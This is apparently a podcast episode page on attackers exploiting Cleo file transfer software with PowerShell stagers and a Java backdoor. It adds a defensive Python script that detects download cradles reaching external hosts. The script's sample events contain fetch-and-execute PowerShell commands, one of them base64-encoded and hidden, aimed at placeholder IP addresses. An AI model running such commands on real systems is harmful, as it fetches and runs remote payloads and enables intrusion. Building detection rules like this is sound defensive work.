Cleo’s trojan horse. [Research Saturday]
Feb 8, 2025
Mark Manglicmot, SVP of Security Services at Arctic Wolf, walks through the Cleopatra mass exploitation campaign, in which attackers exploited vulnerabilities in Cleo's managed file transfer (MFT) products and used PowerShell stagers to deploy a Java backdoor. He discusses why MFT software draws ransomware operators, and stresses the need for proactive defenses: prompt patching, robust vulnerability management, and monitoring that catches the staging behavior before the backdoor lands.
AI Snips
MFT as an Attractive Target
- Managed File Transfer (MFT) software has become an attractive target for ransomware attackers.
- Accessing MFT software allows attackers to compromise multiple companies in a supply chain simultaneously.
Termite Group's Attacks
- The Termite group attacked Blue Yonder, a supply chain management software vendor, in November.
- They used a similar attack method in the Cleopatra attack this summer.
Mitigating Attack Chain
- Monitor for malicious PowerShell scripts connecting to external IPs and downloading payloads.
- Pay close attention to any software using auto-run features, and restrict file system access.
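The first mitigation above, monitoring PowerShell for download cradles that reach external addresses, is concrete enough to show in code. The following is an added example written for this page, not code from Arctic Wolf or from the episode. It scans a handful of constructed PowerShell script-block and command-line events (not real telemetry), expands any `-EncodedCommand` argument so the cradle hidden inside base64 is visible, extracts the hosts contacted, and flags those that are neither RFC 1918/loopback/link-local addresses nor on an assumed allowlist. The internal ranges, the sample addresses (RFC 5737 documentation space), and the `updates.example.com` allowlist entry are all assumptions for the demonstration.

```python
"""Flag PowerShell events that fetch a payload from an external host.

Added example for illustration; the sample events below are constructed,
not captured telemetry.
"""
import base64
import ipaddress
import re
from dataclasses import dataclass

# Common download-cradle cmdlets and .NET calls seen in PowerShell stagers.
CRADLE_RE = re.compile(
    r"(?i)\b(?:DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|iwr"
    r"|Invoke-RestMethod|irm|Start-BitsTransfer|curl|wget)\b"
)
# Host portion of any http/https/ftp URL in the event text.
URL_RE = re.compile(r"(?i)\b(?:https?|ftp)://([^/\s'\"]+)")
# -e / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE once decoded).
ENC_RE = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})")

# Assumed internal address space; adjust to the environment being monitored.
INTERNAL_NETS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
              "127.0.0.0/8", "169.254.0.0/16")
]
# Assumed allowlist of legitimate update hosts (hypothetical name).
ALLOWLIST = frozenset({"updates.example.com"})


def _encode_command(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode()


# Constructed sample events: (record id, script block or command line).
SAMPLE_EVENTS = [
    (1, "Get-ChildItem C:\\Users | Measure-Object"),
    (2, "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.45/stage.ps1')"),
    (3, "Invoke-WebRequest -Uri http://10.0.4.12/update.zip -OutFile C:\\temp\\u.zip"),
    (4, "powershell.exe -nop -w hidden -enc " + _encode_command(
        "(New-Object Net.WebClient).DownloadFile('http://198.51.100.7/a.jar',"
        "'C:\\ProgramData\\a.jar')")),
    (5, "Invoke-WebRequest https://updates.example.com/patch.msi -OutFile p.msi"),
]


@dataclass
class Finding:
    record_id: int
    host: str
    reason: str


def expand_encoded(text: str) -> str:
    """Append the plaintext of any -EncodedCommand blob so later checks can see it."""
    out = text
    for m in ENC_RE.finditer(text):
        try:
            out += " " + base64.b64decode(m.group(1)).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            pass  # not a valid blob; keep the original text only
    return out


def is_external(host: str) -> bool:
    """True for literal IPs outside INTERNAL_NETS; hostnames are treated as external
    (DNS resolution is deliberately out of scope here)."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return True
    return not any(ip in net for net in INTERNAL_NETS)


def scan_events(events, allowlist=ALLOWLIST):
    """Return a Finding for each event that pairs a download cradle with an external host."""
    findings = []
    for record_id, text in events:
        expanded = expand_encoded(text)
        if not CRADLE_RE.search(expanded):
            continue  # no download primitive, nothing to chase
        for host in URL_RE.findall(expanded):
            host = host.rsplit(":", 1)[0]  # strip a port (IPv4 / hostname only)
            if host in allowlist or not is_external(host):
                continue
            findings.append(Finding(record_id, host, "download cradle to external host"))
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"record {f.record_id}: {f.reason} ({f.host})")
```

Run against the sample set, only records 2 and 4 are reported: record 3 pulls from an internal address and record 5 hits the allowlisted update host. Record 4 is caught only because the encoded command is expanded first; a rule that matches on the raw command line would see nothing but base64. In production the event source would be PowerShell script-block logging or process-creation events rather than an inline list, and the second mitigation above, watching the auto-run directory for dropped files and restricting who can write there, should be paired with it so the stager is caught whether or not it phones home in a way this rule recognizes.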